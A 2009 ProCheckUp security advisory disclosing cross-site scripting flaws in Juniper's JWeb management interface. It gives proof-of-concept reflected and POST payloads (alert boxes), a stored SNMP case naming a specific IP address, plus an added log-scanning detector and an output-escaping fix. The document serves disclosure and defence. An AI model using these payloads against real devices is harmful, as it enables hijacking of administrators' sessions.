PR09-10 - Juniper JunOS JWeb authenticated XSS

Vulnerability found:
25 June 2009
Vendor informed:
31 July 2009
Severity level:
Medium
Credits:
Richard Brain of ProCheckUp Ltd (www.procheckup.com)
Description:
There is a cross-site scripting vulnerability in Juniper's JUNOS web interface. JWeb provides a web interface that allows JUNOS to be managed from a browser.
ProCheckUp found that, by making a malformed authenticated request to the JWeb interface, vanilla cross-site scripting (XSS) attacks are possible.

Consequences

An attacker may be able to cause execution of malicious scripting code in the browser of a user who clicks on a link or visits a malicious webpage. The malicious code would run in the security context of the vulnerable website.

Successfully tested on

Juniper Networks Juniper Web Management (JWeb) Version: 8.5R1.14

This type of attack can result in non-persistent defacement of the target site, or the redirection of confidential information (e.g. passwords or session IDs) to unauthorised third parties.
Proof of concept:
1) http://target-domain.foo/jexec?JEXEC_MODE=JEXEC_MODE_RELAY_OUTPUT&JEXEC_OUTID=")></script><script>alert(1)</script>&JEXEC_RPC=request-background-task-start-junoscript
2) http://target-domain.foo/scripter.php?act="><script>alert(1)</script>&debug=1&ifid=1&refresh-time=1&
3) http://target-domain.foo/scripter.php?refresh-time="><script>alert(1)</script>
4) http://target-domain.foo/scripter?act=header&ifid=')"><script>alert(1)</script>&
5) http://target-domain.foo/configuration?m[]=history&action=rollback&revision="><script>alert(1)</script>

6) The m[] parameter is vulnerable to XSS across multiple programs; JWeb uses the m[] parameter to select which program to run.
http://target-domain.foo/monitor?m[]='><script>alert(1)</script>
http://target-domain.foo/manage?m[]='><script>alert(1)</script>
http://target-domain.foo/events?m[]='><script>alert(1)</script>
http://target-domain.foo/configuration?m[]='><script>alert(1)</script>
http://target-domain.foo/alarms?m[]='><script>alert(1)</script>
http://target-domain.foo/?m[]='><script>alert(1)</script>
http://target-domain.foo/?action=browse&m[]="><script>alert(1)</SCRIPT>&path=/var/crash&
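A defender-side check for items 1 to 6 above, added here as an example that is not part of the original advisory: it scans web-server access-log lines for script markup in JWeb query parameters, decoding percent-encoding first so that encoded payloads such as the one in item 5 are not missed. The log lines, parameter names and the detection pattern are constructed for illustration and are not taken from any real device.

```python
import re
from urllib.parse import unquote_plus, urlparse, parse_qs

# Constructed sample access-log lines (common log format); not from any real device.
SAMPLE_LOG = """\
10.0.0.5 - - [25/Jun/2009:10:01:12 +0100] "GET /monitor?m[]=status HTTP/1.1" 200 5120
10.0.0.5 - - [25/Jun/2009:10:01:40 +0100] "GET /monitor?m[]='><script>alert(1)</script> HTTP/1.1" 200 5301
10.0.0.7 - - [25/Jun/2009:10:02:03 +0100] "GET /configuration?m[]=history&action=rollback&revision=%22%3E%3Cscript%3Ealert(1)%3C/script%3E HTTP/1.1" 200 4410
10.0.0.9 - - [25/Jun/2009:10:02:30 +0100] "GET /scripter.php?refresh-time=30 HTTP/1.1" 200 812
"""

# Extract the request line: method and request target.
REQUEST_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"')
# Markup that should never appear in a JWeb query parameter value.
PAYLOAD_RE = re.compile(r'<\s*/?\s*script|javascript:|on\w+\s*=', re.IGNORECASE)


def suspicious_params(target):
    """Return (param, value) pairs whose decoded value looks like injected markup."""
    parsed = urlparse(target)
    hits = []
    # keep_blank_values keeps '?m[]=' with an empty value; parse_qs decodes percent-encoding.
    for name, values in parse_qs(parsed.query, keep_blank_values=True).items():
        for v in values:
            decoded = unquote_plus(v)  # second pass catches double-encoded payloads
            if PAYLOAD_RE.search(decoded):
                hits.append((name, decoded))
    return hits


def scan_log(text):
    """Scan access-log text and return one finding per suspicious parameter."""
    findings = []
    for lineno, line in enumerate(text.splitlines(), 1):
        m = REQUEST_RE.search(line)
        if not m:
            continue
        target = m.group("target")
        for name, value in suspicious_params(target):
            findings.append({
                "line": lineno,
                "path": urlparse(target).path,
                "param": name,
                "value": value,
            })
    return findings


if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        print(f"line {f['line']}: {f['path']} param {f['param']!r} -> {f['value']!r}")
```

Run against the embedded sample, the scanner flags line 2 (the m[] parameter on /monitor) and line 3 (the encoded revision parameter on /configuration) and ignores the two benign requests. POST bodies such as the one in item 7 are not written to access logs, so that case needs a reverse proxy or WAF that inspects request bodies.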

7) The configuration program is vulnerable to a POST XSS attack

POST /configuration?m[]=wizards&m[]=https HTTP/1.1
Host: target-domain.foo
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://target-domain.foo/configuration?m[]=wizards&m[]=https&start=true
Cookie: PHPSESSID=faf6133c44481c24b61a04f4c0ef57be;
Content-Type: application/x-www-form-urlencoded
Content-Length: 782
https-allifls-hidden=false&https-interfaces-hidden=false&https-cert-hidden=false&local-cert-delete-hidden=true&wizard-next=b7777"><script>alert(1)</script>095b2419adf&https-allifls=on&https-allifls-original=on&xnmssltoggle=on&http-allifls-hidden=false&http-interfaces-hidden=false&certs-hidden=false&right-http-interfaces-duallist%5b%5d=lo0.16384&http-allifls=on&http-allifls-original=off&wizard-ids=&current-page=main&http-enable-hidden=false&text-hidden=false&wizard-args=&wizard-previous=&xnmssltoggle-hidden=false&httpstoggle-hidden=false&right-https-interfaces-duallist%5b%5d=lo0.16384&left-http-interfaces-duallist%5b%5d=em0.0&http-enable-original=on&httpstoggle-original=off&apply-button=Apply&xnmssltoggle-original=off&xnmssl-cert-hidden=false&http-enable=on&httpstoggle=on&wizard-mode=&http-interfaces-original=Array

RESULTS (excerpt):
</script>
<!--
current wizard: firewall-acl
current page : b7777"><script>alert(1)</script>095b2419adf
current page number: 0
-->
</form> </td>
</tr>
</table>

8) SNMP parameters are vulnerable to a persistent XSS attack, which allows permanent alteration of the page code when viewed.
SNMP parameters can be viewed and entered on this page: http://212.111.49.111/configuration?m[]=wizards&m[]=snmp&start=true
The affected fields are "Contact Information", "System Description", "Local Engine ID", "System Location" and "System Name Override".

The following URLs, when accessed, cause the stored XSS payloads to execute:
http://212.111.49.111/configuration?m[]=wizards&m[]=snmp&start=true
http://212.111.49.111/configuration?m[]=viewedit&m[]=viewtext

Note: the previous examples were tested on IE7 and FF2.
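The persistent case in item 8 is fixed on the output side: a stored SNMP value has to be HTML-escaped every time it is written back into the page, both inside the input's value attribute and as visible text. The following is an added example, not Juniper's JWeb code (which is PHP), written in Python to show the unsafe rendering beside the escaped one; the field names and stored values are constructed for illustration.

```python
from html import escape

# Constructed SNMP values as an administrator might have saved them; the last one
# carries the kind of markup the advisory describes for the Contact Information field.
SNMP_VALUES = {
    "System Name Override": "edge-router-1",
    "System Location": "Rack 4, London",
    "Contact Information": 'noc@example.com"><script>alert(1)</script>',
}


def render_snmp_fields(values, escape_output=True):
    """Render stored SNMP parameters back into an HTML form.

    escape_output=False reproduces the unsafe pattern (raw interpolation into an
    attribute and a text node). escape_output=True is the fix: every untrusted value
    is HTML-escaped with quote=True, so a stored '"' cannot terminate the attribute
    and '<' cannot open a tag.
    """
    rows = []
    for label, value in values.items():
        safe = escape(value, quote=True) if escape_output else value
        rows.append(
            f"<tr><td>{label}</td>"
            f'<td><input type="text" name="{label}" value="{safe}"></td>'
            f"<td>{safe}</td></tr>"
        )
    return "<table>\n" + "\n".join(rows) + "\n</table>"


def contains_injected_script(html_text):
    """Crude check used only to contrast the two renderings."""
    return "<script>" in html_text.lower()


if __name__ == "__main__":
    print(render_snmp_fields(SNMP_VALUES, escape_output=False))
    print(render_snmp_fields(SNMP_VALUES, escape_output=True))
```

Escaping is context-specific: `html.escape(..., quote=True)` is the right primitive for HTML text and quoted attribute values, which are the two contexts in this form; a value placed inside a script block or a URL would need a different encoder.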
References:
ProCheckUp Vulnerabilities
http://www.procheckup.com/vulnerability_manager
Legal:
Copyright 2009 Procheckup Ltd. All rights reserved.

Permission is granted for copying and circulating this Bulletin to the Internet community for the purpose of alerting them to problems, if and only if, the Bulletin is not edited or changed in any way, is attributed to Procheckup, and provided such reproduction and/or distribution is performed for non-commercial purposes.

Any other use of this information is prohibited. Procheckup is not liable for any misuse of this information by any third party.